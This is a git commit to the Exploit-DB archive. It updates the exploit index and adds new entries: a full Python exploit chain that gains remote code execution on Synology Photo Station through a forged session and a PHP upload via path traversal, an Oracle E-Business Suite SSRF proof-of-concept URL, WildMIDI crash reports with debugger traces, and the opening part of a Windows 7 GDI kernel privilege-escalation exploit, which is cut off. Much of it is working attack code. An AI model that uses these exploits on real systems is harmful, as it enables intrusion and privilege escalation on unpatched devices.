DB: 2017-08-09

4 new exploits WildMIDI 0.4.2 - Multiple Vulnerabilities Comodo Backup 4.4.0.0 - Null Pointer Dereference EOP Comodo Backup 4.4.0.0 - Null Pointer Dereference Privilege Escalation Microsoft Windows - LNK Shortcut File Code Execution Microsoft Windows - '.LNK' Shortcut File Code Execution Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017) Oracle E-Business Suite 12.x - Server-Side Request Forgery Advantech SUSIAccess <= 3.0 - Directory Traversal / Information Disclosure (Metasploit) Advantech SUSIAccess <= 3.0 - 'RecoveryMgmt' File Upload Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit) Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload Technicolor TC7337 - SSID Persistent Cross-Site Scripting Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution
2017-08-09 05:01:29 +00:00 · 2017-08-09 05:01:29 +00:00 · 3f58d5334c
commit 3f58d5334c
parent e0bc9883d1
5 changed files with 884 additions and 5 deletions
--- a/files.csv
+++ b/files.csv
@ -5637,6 +5637,7 @@ id,file,description,date,author,platform,type,port
 42400,platforms/linux/dos/42400.txt,"libao 1.2.0 - Denial of Service",2017-07-31,qflb.wu,linux,dos,0
 42409,platforms/linux/dos/42409.txt,"libmad 0.15.1b - 'mp3' Memory Corruption",2017-08-01,qflb.wu,linux,dos,0
 42411,platforms/windows/dos/42411.py,"Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service",2017-08-01,"Guillaume Kaddouch",windows,dos,0
+42433,platforms/linux/dos/42433.txt,"WildMIDI 0.4.2 - Multiple Vulnerabilities",2017-08-08,qflb.wu,linux,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8622,7 +8623,7 @@ id,file,description,date,author,platform,type,port
 35992,platforms/windows/local/35992.c,"K7 Computing Multiple Products - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0
 35901,platforms/windows/local/35901.txt,"VideoLAN VLC Media Player 2.1.5 - DEP Access Violation",2015-01-26,"Veysel HATAS",windows,local,0
 35902,platforms/windows/local/35902.txt,"VideoLAN VLC Media Player 2.1.5 - Write Access Violation",2015-01-26,"Veysel HATAS",windows,local,0
-35905,platforms/windows/local/35905.c,"Comodo Backup 4.4.0.0 - Null Pointer Dereference EOP",2015-01-26,"Parvez Anwar",windows,local,0
+35905,platforms/windows/local/35905.c,"Comodo Backup 4.4.0.0 - Null Pointer Dereference Privilege Escalation",2015-01-26,"Parvez Anwar",windows,local,0
 35983,platforms/windows/local/35983.rb,"Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004) (Metasploit)",2015-02-03,Metasploit,windows,local,0
 35934,platforms/osx/local/35934.txt,"Apple Mac OSX < 10.10.x - GateKeeper Bypass",2015-01-29,"Amplia Security Research",osx,local,0
 35936,platforms/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Privilege Escalation (MS14-070)",2015-01-29,KoreLogic,windows,local,0
@ -9173,7 +9174,8 @@ id,file,description,date,author,platform,type,port
 42424,platforms/linux/local/42424.py,"DNSTracer 1.9 - Buffer Overflow",2017-08-03,j0lama,linux,local,0
 42425,platforms/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",windows,local,0
 42426,platforms/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",windows,local,0
-42429,platforms/windows/local/42429.py,"Microsoft Windows - LNK Shortcut File Code Execution",2017-08-06,nixawk,windows,local,0
+42429,platforms/windows/local/42429.py,"Microsoft Windows - '.LNK' Shortcut File Code Execution",2017-08-06,nixawk,windows,local,0
+42432,platforms/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 -  GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -38196,6 +38198,7 @@ id,file,description,date,author,platform,type,port
 42332,platforms/json/webapps/42332.rb,"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)",2017-07-18,xort,json,webapps,0
 42333,platforms/hardware/webapps/42333.rb,"Barracuda Load Balancer Firmware < 6.0.1.006 - Remote Command Injection (Metasploit)",2017-07-18,xort,hardware,webapps,0
 42335,platforms/multiple/webapps/42335.txt,"PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting",2017-07-18,"Daniel Correa",multiple,webapps,0
+42340,platforms/jsp/webapps/42340.txt,"Oracle E-Business Suite 12.x - Server-Side Request Forgery",2017-07-19,"Sarath Nair",jsp,webapps,0
 42342,platforms/cgi/webapps/42342.txt,"Sonicwall Secure Remote Access 8.1.0.2-14sv - Command Injection",2017-07-19,xort,cgi,webapps,0
 42343,platforms/cgi/webapps/42343.rb,"Sonicwall < 8.1.0.6-21sv - 'gencsr.cgi' Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0
 42345,platforms/cgi/webapps/42345.rb,"Netscaler SD-WAN 9.1.2.26.561201 - Command Injection (Metasploit)",2017-07-19,xort,cgi,webapps,0
@ -38214,8 +38217,8 @@ id,file,description,date,author,platform,type,port
 42381,platforms/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",php,webapps,0
 42387,platforms/php/webapps/42387.txt,"Joomla! Component CCNewsLetter 2.1.9 - 'sbid' Parameter SQL Injection",2017-07-27,"Shahab Shamsi",php,webapps,0
 42388,platforms/hardware/webapps/42388.txt,"FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,hardware,webapps,0
-42401,platforms/jsp/webapps/42401.rb,"Advantech SUSIAccess <= 3.0 - Directory Traversal / Information Disclosure (Metasploit)",2017-08-01,"James Fitts",jsp,webapps,0
-42402,platforms/jsp/webapps/42402.rb,"Advantech SUSIAccess <= 3.0 - 'RecoveryMgmt' File Upload",2017-08-01,"James Fitts",jsp,webapps,0
+42401,platforms/jsp/webapps/42401.rb,"Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)",2017-08-01,"James Fitts",jsp,webapps,0
+42402,platforms/jsp/webapps/42402.rb,"Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload",2017-08-01,"James Fitts",jsp,webapps,0
 42403,platforms/php/webapps/42403.txt,"VehicleWorkshop - Authentication Bypass",2017-08-01,"Touhid M.Shaikh",php,webapps,0
 42404,platforms/php/webapps/42404.txt,"VehicleWorkshop - Arbitrary File Upload",2017-08-01,"Touhid M.Shaikh",php,webapps,0
 42408,platforms/hardware/webapps/42408.txt,"SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection",2017-08-01,"Andy Tan",hardware,webapps,0
@ -38229,5 +38232,6 @@ id,file,description,date,author,platform,type,port
 42420,platforms/php/webapps/42420.txt,"EDUMOD Pro 1.3 - SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
 42421,platforms/php/webapps/42421.txt,"Muviko 1.0 - 'q' Parameter SQL Injection",2017-08-02,"Kaan KAMIS",php,webapps,0
 42423,platforms/php/webapps/42423.txt,"Joomla! Component StreetGuessr Game 1.1.8 - SQL Injection",2017-08-03,"Ihsan Sencan",php,webapps,0
-42427,platforms/hardware/webapps/42427.html,"Technicolor TC7337 - SSID Persistent Cross-Site Scripting",2017-08-03,"Geolado giolado",hardware,webapps,0
+42427,platforms/hardware/webapps/42427.html,"Technicolor TC7337 - 'SSID' Persistent Cross-Site Scripting",2017-08-03,"Geolado giolado",hardware,webapps,0
 42431,platforms/php/webapps/42431.txt,"WordPress Plugin Easy Modal 2.0.17 - SQL Injection",2017-08-07,defensecode,php,webapps,80
+42434,platforms/hardware/webapps/42434.py,"Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution",2017-08-08,"Kacper Szurek",hardware,webapps,0
--- a/platforms/hardware/webapps/42434.py
+++ b/platforms/hardware/webapps/42434.py
@ -0,0 +1,56 @@
+'''
+Source: https://blogs.securiteam.com/index.php/archives/3356
+
+Vulnerability details
+The remote code execution is a combination of 4 different vulnerabilities:
+
+Upload arbitrary files to the specified directories
+Log in with a fake authentication mechanism
+Log in to Photo Station with any identity
+Execute arbitrary code by authenticated user with administrator privileges
+The chain of vulnerabilities will allow you, in the end, to execute code as:
+
+uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)
+'''
+import requests
+
+# What server you want to attack
+synology_ip = 'http://192.168.1.100'
+
+# Your current IP
+ip = '192.168.1.200'
+
+# PHP code you want to execute
+php_to_execute = '<?php echo system("id"); ?>'
+
+encoded_session = 'root|a:2:{s:19:"security_identifier";s:'+str(len(ip))+':"'+ip+'";s:15:"admin_syno_user";s:7:"hlinak3";}'
+
+print "[+] Set fake admin sesssion"
+file = [('file', ('foo.jpg', encoded_session))]
+
+r = requests.post('{}/photo/include/synotheme_upload.php'.format(synology_ip), data = {'action':'logo_upload'}, files=file)
+print r.text
+
+print "[+] Login as fake admin"
+
+# Depends on version it might be stored in different dirs
+payload = {'session': '/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png'}
+# payload = {'session': '/../../../../../var/services/photo/@eaDir/SYNOPHOTO_THEME_DIR/photo_custom_preview_logo.png'}
+
+try_login = requests.post('{}/photo/include/file_upload.php'.format(synology_ip), params=payload)
+
+whichact = {'action' : 'get_setting'}
+r = requests.post('{}/photo/admin/general_setting.php'.format(synology_ip), data=whichact, cookies=try_login.cookies)
+print r.text
+
+print "[+] Upload php file"
+
+c = {'action' : 'save', 'image' : 'data://text/plain;base64,'+php_to_execute.encode('base64'), 'path' : '/volume1/photo/../../../volume1/@appstore/PhotoStation/photo/facebook/exploit'.encode("base64"), 'type' : 'php'}
+r = requests.post('{}/photo/PixlrEditorHandler.php'.format(synology_ip), data=c, cookies=try_login.cookies)
+print r.text
+
+
+print "[+] Execute payload"
+f = requests.get('{}/photo/facebook/exploit.php'.format(synology_ip))
+
+print f.text
--- a/platforms/jsp/webapps/42340.txt
+++ b/platforms/jsp/webapps/42340.txt
@ -0,0 +1,38 @@
+# Exploit Title: Oracle E-Business Suite - Server Side Request Forgery
+# Date: 19 July 2017
+# Exploit Author: Sarath Nair aka AceNeon13
+# Contact: @AceNeon13
+# Greetings: Raj3sh.tv, Deepu.tv
+# Vendor Homepage: www.oracle.com
+# Software Link:
+http://www.oracle.com/us/products/applications/ebusiness/overview/index.html
+# Version: Oracle E-Business Suite 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6
+# CVE: CVE-2017-10246
+
+# PoC Exploit: Server Side Request Forgery
+------------------------------------------
+Vulnerable URL:
+http://
+<EBS_Application>/OA_HTML/help?locale=en_AE&group=per:br_prod_HR:US&topic=http://
+<Internal_IP:Port>
+
+# Description: The application is vulnerable to server side request forgery
+attacks. We were able to use the web server to send packets internally and
+thereby perform port scan on other internal assets and/or obtain
+information accessible only from inside or otherwise not accessible to an
+external user. It was also possible to query internal server information
+otherwise unavailable publicly.
+# Impact: A presumed attacker could use EBS server resources to conduct
+internal information gathering or obtain information otherwise inaccessible
+publicly.
+# Solution: Apply the oracle EBS patch released on 18 July 2017
+
+########################################
+# Vulnerability Disclosure Timeline:
+
+2017-April-29:  Discovered vulnerability
+2017-April-30:  Vendor Notification
+2017-May-01:  Vendor Response/Feedback
+2017-July-18:  Vendor Fix/Patch
+2017-July-19:  Public Disclosure
+########################################
--- a/platforms/linux/dos/42433.txt
+++ b/platforms/linux/dos/42433.txt
@ -0,0 +1,355 @@
+wildmidi multiple vulnerabilities
+================
+Author : qflb.wu
+===============
+
+
+Introduction:
+=============
+WildMIDI is a simple software midi player which has a core softsynth library that can be use with other applications.The WildMIDI library uses Gravis Ultrasound patch files to convert MIDI files into audio which is then passed back to the calling application. The library API is designed so that it is easy to include WildMIDI into applications that wish to include MIDI file playback.
+
+
+Affected version:
+=====
+0.4.2
+
+
+Vulnerability Description:
+==========================
+1.
+the _WM_SetupMidiEvent function in internal_midi.c:2318 in WildMIDI 0.4.2 can cause a denial of service(invalid memory read and application crash) via a crafted mid file.
+
+
+./wildmidi wildmidi_0.4.2_invalid_memory_read_1.mid -o out.wav
+or ./wildmidi wildmidi_0.4.2_invalid_memory_read_1.mid
+
+
+debug info:
+Program received signal SIGSEGV, Segmentation fault.
+0x00007ffff7bc1cee in _WM_SetupMidiEvent (mdi=0x7ffff7f87010,
+event_data=0x6091bc "\202\035)", running_event=144 '\220')
+at /home/a/Downloads/wildmidi-master/src/internal_midi.c:2318
+2318if (sysex_store[sysex_store_len - 1] == 0xF7) {
+(gdb) bt
+#0 0x00007ffff7bc1cee in _WM_SetupMidiEvent (mdi=0x7ffff7f87010,
+event_data=0x6091bc "\202\035)", running_event=144 '\220')
+at /home/a/Downloads/wildmidi-master/src/internal_midi.c:2318
+#1 0x00007ffff7bc5738 in _WM_ParseNewMidi (midi_data=0x609423 "", midi_size=0)
+at /home/a/Downloads/wildmidi-master/src/f_midi.c:246
+#2 0x00007ffff7bb685b in WildMidi_Open (
+midifile=0x7fffffffe325 "/home/a/Documents/file")
+at /home/a/Downloads/wildmidi-master/src/wildmidi_lib.c:1667
+#3 0x000000000040373c in main (argc=4, argv=0x7fffffffdf88)
+at /home/a/Downloads/wildmidi-master/src/wildmidi.c:1804
+(gdb) disassemble 0x00007ffff7bc1cee,0x00007ffff7bc1cef
+Dump of assembler code from 0x7ffff7bc1cee to 0x7ffff7bc1cef:
+=> 0x00007ffff7bc1cee <_WM_SetupMidiEvent+3490>:movzbl (%rax),%eax
+End of assembler dump.
+(gdb) disassemble 0x00007ffff7bc1cee,0x00007ffff7bc1cff
+Dump of assembler code from 0x7ffff7bc1cee to 0x7ffff7bc1cff:
+=> 0x00007ffff7bc1cee <_WM_SetupMidiEvent+3490>:movzbl (%rax),%eax
+0x00007ffff7bc1cf1 <_WM_SetupMidiEvent+3493>:cmp $0xf7,%al
+0x00007ffff7bc1cf3 <_WM_SetupMidiEvent+3495>:jne 0x7ffff7bc1ed7 <_WM_SetupMidiEvent+3979>
+0x00007ffff7bc1cf9 <_WM_SetupMidiEvent+3501>:movb $0x41,-0x40(%rbp)
+0x00007ffff7bc1cfd <_WM_SetupMidiEvent+3505>:movb $0x10,-0x3f(%rbp)
+End of assembler dump.
+(gdb) i r
+rax 0x1006096af4301297327
+rbx 0x00
+rcx 0x00
+rdx 0xffffffff4294967295
+rsi 0x6091bc6328764
+rdi 0x6096b06330032
+rbp 0x7fffffffdbd00x7fffffffdbd0
+rsp 0x7fffffffdb400x7fffffffdb40
+r8 0x00
+r9 0x7ffff78b97b8140737346508728
+r10 0x7ffff78b8760140737346504544
+r11 0xffffff014294967041
+r12 0x401ea04202144
+r13 0x7fffffffdf80140737488347008
+r14 0x00
+r15 0x00
+rip 0x7ffff7bc1cee0x7ffff7bc1cee <_WM_SetupMidiEvent+3490>
+eflags 0x10206[ PF IF RF ]
+cs 0x3351
+ss 0x2b43
+ds 0x00
+es 0x00
+fs 0x00
+---Type to continue, or q to quit---
+gs 0x00
+(gdb) x/20x 0x1006096af
+0x1006096af:Cannot access memory at address 0x1006096af
+(gdb)
+
+
+------------------line:2318
+//sysex_len , sysex_store_len = 0,sysex_store_len - 1 = 0xFFFFFFFF 0x6096b0 + 0xFFFFFFFF = 0x1006096af
+
+
+sysex_store = realloc(sysex_store,sizeof(uint8_t) * (sysex_store_len + sysex_len));
+memcpy(&sysex_store[sysex_store_len], event_data, sysex_len);
+sysex_store_len += sysex_len;
+
+
+if (sysex_store[sysex_store_len - 1] == 0xF7) {
+uint8_t rolandsysexid[] = { 0x41, 0x10, 0x42, 0x12 };
+
+
+POC:
+wildmidi_0.4.2_invalid_memory_read_1.mid
+CVE:
+CVE-2017-11661
+
+
+2.
+the _WM_ParseNewMidi function in f_midi.c in WildMIDI 0.4.2 can cause a denial of service(invalid memory read and application crash) via a crafted mid file.
+
+
+./wildmidi wildmidi_0.4.2_invalid_memory_read_2.mid -o out.wav
+or ./wildmidi wildmidi_0.4.2_invalid_memory_read_2.mid
+
+
+debug info:
+Program received signal SIGSEGV, Segmentation fault.
+0x00007ffff7bc59d9 in _WM_ParseNewMidi (midi_data=0x609423 "", midi_size=0)
+at /home/a/Downloads/wildmidi-master/src/f_midi.c:274
+274if (*tracks[i] > 0x7f) {
+(gdb) bt
+#0 0x00007ffff7bc59d9 in _WM_ParseNewMidi (midi_data=0x609423 "", midi_size=0)
+at /home/a/Downloads/wildmidi-master/src/f_midi.c:274
+#1 0x00007ffff7bb685b in WildMidi_Open (
+midifile=0x7fffffffe325 "/home/a/Documents/file")
+at /home/a/Downloads/wildmidi-master/src/wildmidi_lib.c:1667
+#2 0x000000000040373c in main (argc=4, argv=0x7fffffffdf88)
+at /home/a/Downloads/wildmidi-master/src/wildmidi.c:1804
+(gdb) disassemble 0x00007ffff7bc59d9,0x00007ffff7bc59ff
+Dump of assembler code from 0x7ffff7bc59d9 to 0x7ffff7bc59ff:
+=> 0x00007ffff7bc59d9 <_WM_ParseNewMidi+2974>:movzbl (%rax),%eax
+0x00007ffff7bc59dc <_WM_ParseNewMidi+2977>:test %al,%al
+0x00007ffff7bc59de <_WM_ParseNewMidi+2979>:jns 0x7ffff7bc5a6d <_WM_ParseNewMidi+3122>
+0x00007ffff7bc59e4 <_WM_ParseNewMidi+2985>:mov -0x68(%rbp),%eax
+0x00007ffff7bc59e7 <_WM_ParseNewMidi+2988>:lea 0x0(,%rax,4),%rdx
+0x00007ffff7bc59ef <_WM_ParseNewMidi+2996>:mov -0x18(%rbp),%rax
+0x00007ffff7bc59f3 <_WM_ParseNewMidi+3000>:add %rax,%rdx
+0x00007ffff7bc59f6 <_WM_ParseNewMidi+3003>:mov -0x68(%rbp),%eax
+0x00007ffff7bc59f9 <_WM_ParseNewMidi+3006>:lea 0x0(,%rax,4),%rcx
+End of assembler dump.
+(gdb) i r
+rax 0x7093a27377826
+rbx 0x00
+rcx 0x60909d6328477
+rdx 0x88
+rsi 0x60909d6328477
+rdi 0x7ffff7f87010140737353642000
+rbp 0x7fffffffdc600x7fffffffdc60
+rsp 0x7fffffffdbe00x7fffffffdbe0
+r8 0x00
+r9 0x7ffff78b97b8140737346508728
+r10 0x7fffffffd900140737488345344
+r11 0x7ffff7592fd0140737343205328
+r12 0x401ea04202144
+r13 0x7fffffffdf80140737488347008
+r14 0x00
+r15 0x00
+rip 0x7ffff7bc59d90x7ffff7bc59d9 <_WM_ParseNewMidi+2974>
+eflags 0x10206[ PF IF RF ]
+cs 0x3351
+ss 0x2b43
+ds 0x00
+es 0x00
+fs 0x00
+---Type to continue, or q to quit---
+gs 0x00
+(gdb) x/20x 0x7093a2
+0x7093a2:Cannot access memory at address 0x7093a2
+(gdb)
+
+
+POC:
+wildmidi_0.4.2_invalid_memory_read_2.mid
+CVE:
+CVE-2017-11662
+
+
+3.
+the _WM_SetupMidiEvent function in internal_midi.c:2315 in WildMIDI 0.4.2 can cause a denial of service(invalid memory read and application crash) via a crafted mid file.
+
+
+./wildmidi wildmidi_0.4.2_invalid_memory_read_3.mid -o out.wav
+or ./wildmidi wildmidi_0.4.2_invalid_memory_read_3.mid
+
+
+debug info:
+Breakpoint 2, 0x00007ffff7bc1cd4 in _WM_SetupMidiEvent (mdi=0x7ffff7f87010,
+event_data=0x62bbd7 "", running_event=145 '\221')
+at /home/a/Downloads/wildmidi-master/src/internal_midi.c:2315
+2315memcpy(&sysex_store[sysex_store_len], event_data, sysex_len);
+(gdb) bt
+#0 __memcpy_sse2_unaligned ()
+at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:36
+#1 0x00007ffff7bc1cd9 in _WM_SetupMidiEvent (mdi=0x7ffff7f87010,
+event_data=0x62bbd7 "", running_event=145 '\221')
+at /home/a/Downloads/wildmidi-master/src/internal_midi.c:2315
+#2 0x00007ffff7bc5738 in _WM_ParseNewMidi (midi_data=0x62bca3 "", midi_size=0)
+at /home/a/Downloads/wildmidi-master/src/f_midi.c:246
+#3 0x00007ffff7bb685b in WildMidi_Open (
+midifile=0x7fffffffe349 "/home/a/Documents/file")
+at /home/a/Downloads/wildmidi-master/src/wildmidi_lib.c:1667
+#4 0x000000000040373c in main (argc=2, argv=0x7fffffffdfb8)
+at /home/a/Downloads/wildmidi-master/src/wildmidi.c:1804
+(gdb) disassemble 0x00007ffff7bc1cb9,0x00007ffff7bc1cd9
+Dump of assembler code from 0x7ffff7bc1cb9 to 0x7ffff7bc1cd9:
+0x00007ffff7bc1cb9 <_WM_SetupMidiEvent+3437>:mov %rax,-0x48(%rbp)
+0x00007ffff7bc1cbd <_WM_SetupMidiEvent+3441>:mov -0x5c(%rbp),%edx
+0x00007ffff7bc1cc0 <_WM_SetupMidiEvent+3444>:mov -0x54(%rbp),%ecx
+0x00007ffff7bc1cc3 <_WM_SetupMidiEvent+3447>:mov -0x48(%rbp),%rax
+0x00007ffff7bc1cc7 <_WM_SetupMidiEvent+3451>:add %rax,%rcx
+0x00007ffff7bc1cca <_WM_SetupMidiEvent+3454>:mov -0x80(%rbp),%rax
+0x00007ffff7bc1cce <_WM_SetupMidiEvent+3458>:mov %rax,%rsi
+0x00007ffff7bc1cd1 <_WM_SetupMidiEvent+3461>:mov %rcx,%rdi
+0x00007ffff7bc1cd4 <_WM_SetupMidiEvent+3464>:callq 0x7ffff7bb1600 memcpy@plt
+End of assembler dump.
+(gdb) i r
+rax 0x62bbd76470615
+rbx 0x00
+rcx 0x7fffe41b6010140737020387344
+rdx 0x3e494d465311956
+rsi 0x62bbd76470615
+rdi 0x7fffe41b6010140737020387344
+rbp 0x7fffffffdc000x7fffffffdc00
+rsp 0x7fffffffdb700x7fffffffdb70
+r8 0xffffffff4294967295
+r9 0x00
+r10 0x2234
+r11 0xf78b97014153120513
+r12 0x401ea04202144
+r13 0x7fffffffdfb0140737488347056
+r14 0x00
+r15 0x00
+rip 0x7ffff7bc1cd40x7ffff7bc1cd4 <_WM_SetupMidiEvent+3464>
+eflags 0x202[ IF ]
+cs 0x3351
+ss 0x2b43
+ds 0x00
+es 0x00
+fs 0x00
+---Type to continue, or q to quit---
+gs 0x00
+(gdb) x/20x 0x44750AB
+0x44750ab:Cannot access memory at address 0x44750ab
+(gdb) ni
+
+
+Program received signal SIGSEGV, Segmentation fault.
+__memcpy_sse2_unaligned ()
+at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:36
+36../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory.
+(gdb)
+------------------ line:2315
+//point:sysex_len is larger than the length of event_data
+sysex_store = realloc(sysex_store,sizeof(uint8_t) * (sysex_store_len + sysex_len));
+memcpy(&sysex_store[sysex_store_len], event_data, sysex_len);
+sysex_store_len += sysex_len;
+
+
+POC:
+wildmidi_0.4.2_invalid_memory_read_3.mid
+CVE:
+CVE-2017-11663
+
+
+4.
+the _WM_SetupMidiEvent function in internal_midi.c:2122 in WildMIDI 0.4.2 can cause a denial of service(invalid memory read and application crash) via a crafted mid file.
+
+
+./wildmidi wildmidi_0.4.2_invalid_memory_read_4.mid -o out.wav
+or ./wildmidi wildmidi_0.4.2_invalid_memory_read_4.mid
+
+
+debug info:
+Program received signal SIGSEGV, Segmentation fault.
+__memcpy_sse2_unaligned ()
+at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:36
+36../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory.
+(gdb) bt
+#0 __memcpy_sse2_unaligned ()
+at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:36
+#1 0x00007ffff7bc15d0 in _WM_SetupMidiEvent (mdi=0x7ffff7f87010,
+event_data=0x62b927 "", running_event=0 '\000')
+at /home/a/Downloads/wildmidi-master/src/internal_midi.c:2122
+#2 0x00007ffff7bc5738 in _WM_ParseNewMidi (midi_data=0x62bca3 "", midi_size=0)
+at /home/a/Downloads/wildmidi-master/src/f_midi.c:246
+#3 0x00007ffff7bb685b in WildMidi_Open (
+midifile=0x7fffffffe349 "/home/a/Documents/file")
+at /home/a/Downloads/wildmidi-master/src/wildmidi_lib.c:1667
+#4 0x000000000040373c in main (argc=2, argv=0x7fffffffdfb8)
+at /home/a/Downloads/wildmidi-master/src/wildmidi.c:1804
+(gdb) disassemble 0x00007ffff7bc15b6,0x00007ffff7bc15d0
+Dump of assembler code from 0x7ffff7bc15b6 to 0x7ffff7bc15d0:
+0x00007ffff7bc15b6 <_WM_SetupMidiEvent+1642>:mov %rax,-0x50(%rbp)
+0x00007ffff7bc15ba <_WM_SetupMidiEvent+1646>:mov -0x60(%rbp),%edx
+0x00007ffff7bc15bd <_WM_SetupMidiEvent+1649>:mov -0x80(%rbp),%rcx
+0x00007ffff7bc15c1 <_WM_SetupMidiEvent+1653>:mov -0x50(%rbp),%rax
+0x00007ffff7bc15c5 <_WM_SetupMidiEvent+1657>:mov %rcx,%rsi
+0x00007ffff7bc15c8 <_WM_SetupMidiEvent+1660>:mov %rax,%rdi
+0x00007ffff7bc15cb <_WM_SetupMidiEvent+1663>:callq 0x7ffff7bb1600 memcpy@plt
+End of assembler dump.
+(gdb) i r
+rax 0xffff8000086e68a4-140737346901852
+rbx 0x00
+rcx 0x840e6540902
+rdx 0x42073270451
+rsi 0x62b9276469927
+rdi 0x7ffff7f03010140737353101328
+rbp 0x7fffffffdc000x7fffffffdc00
+rsp 0x7fffffffdb680x7fffffffdb68
+r8 0xffffffff4294967295
+r9 0x00
+r10 0x2234
+r11 0xf7592f014149817089
+r12 0x401ea04202144
+r13 0x7fffffffdfb0140737488347056
+r14 0x00
+r15 0x00
+rip 0x7ffff7592ffe0x7ffff7592ffe <__memcpy_sse2_unaligned+46>
+eflags 0x10206[ PF IF RF ]
+cs 0x3351
+ss 0x2b43
+ds 0x00
+es 0x00
+fs 0x00
+---Type to continue, or q to quit---
+gs 0x00
+(gdb) x/20x 0x66D99A
+0x66d99a:Cannot access memory at address 0x66d99a
+(gdb)
+
+
+----------------line:2122--------------
+//the tmp_length is larger than the length of event_data
+text = malloc(tmp_length + 1);
+memcpy(text, event_data, tmp_length);
+text[tmp_length] = '\0';
+midi_setup_trackname(mdi, text);
+
+
+POC:
+wildmidi_0.4.2_invalid_memory_read_4.mid
+CVE:
+CVE-2017-11664
+
+
+
+
+Fix
+==========
+Fixed:
+https://github.com/Mindwerks/wildmidi/commit/660b513d99bced8783a4a5984ac2f742c74ebbdd
+
+
+POC:
+==========
+https://github.com/Mindwerks/wildmidi/files/1186857/poc.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42433.zip
--- a/platforms/windows/local/42432.cpp
+++ b/platforms/windows/local/42432.cpp
@ -0,0 +1,426 @@
+# E-DB Note: 
+# + Source: https://github.com/sensepost/gdi-palettes-exp
+# + Binary: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42432.exe
+
+#include <Windows.h>
+#include <stdio.h>
+#include <winddi.h>
+#include <Psapi.h>
+
+//From http://stackoverflow.com/a/26414236 this defines the details of the NtAllocateVirtualMemory function
+//which we will use to map the NULL page in user space.
+typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)(
+	HANDLE ProcessHandle,
+	PVOID *BaseAddress,
+	ULONG ZeroBits,
+	PULONG AllocationSize,
+	ULONG AllocationType,
+	ULONG Protect
+	);
+
+static HBITMAP bitmaps[2000];
+static HPALETTE hp[2000];
+HANDLE hpWorker, hpManager, hManager;
+BYTE *bits;
+
+
+// https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives
+//dt nt!_EPROCESS UniqueProcessID ActiveProcessLinks Token
+typedef struct
+{
+	DWORD UniqueProcessIdOffset;
+	DWORD TokenOffset;
+} VersionSpecificConfig;
+
+//VersionSpecificConfig gConfig = { 0x0b4 , 0x0f8  }; //win 7 SP 1
+VersionSpecificConfig gConfig = { 0x0b4 , 0x0f8 };
+void SetAddress(UINT* address) {
+	SetPaletteEntries((HPALETTE)hpManager, 0x3FE, 1, (PALETTEENTRY*)address);
+}
+
+void WriteToAddress(UINT* data, DWORD len) {
+	SetPaletteEntries((HPALETTE)hpWorker, 0, len, (PALETTEENTRY*)data);
+}
+
+UINT ReadFromAddress(UINT src, UINT* dst, DWORD len) {
+	SetAddress((UINT *)&src);
+	DWORD res = GetPaletteEntries((HPALETTE)hpWorker, 0, len, (LPPALETTEENTRY)dst);
+	return res;
+}
+
+// Get base of ntoskrnl.exe
+UINT GetNTOsBase()
+{
+	UINT Bases[0x1000];
+	DWORD needed = 0;
+	UINT krnlbase = 0;
+	if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
+		krnlbase = Bases[0];
+	}
+	return krnlbase;
+}
+
+// Get EPROCESS for System process
+UINT PsInitialSystemProcess()
+{
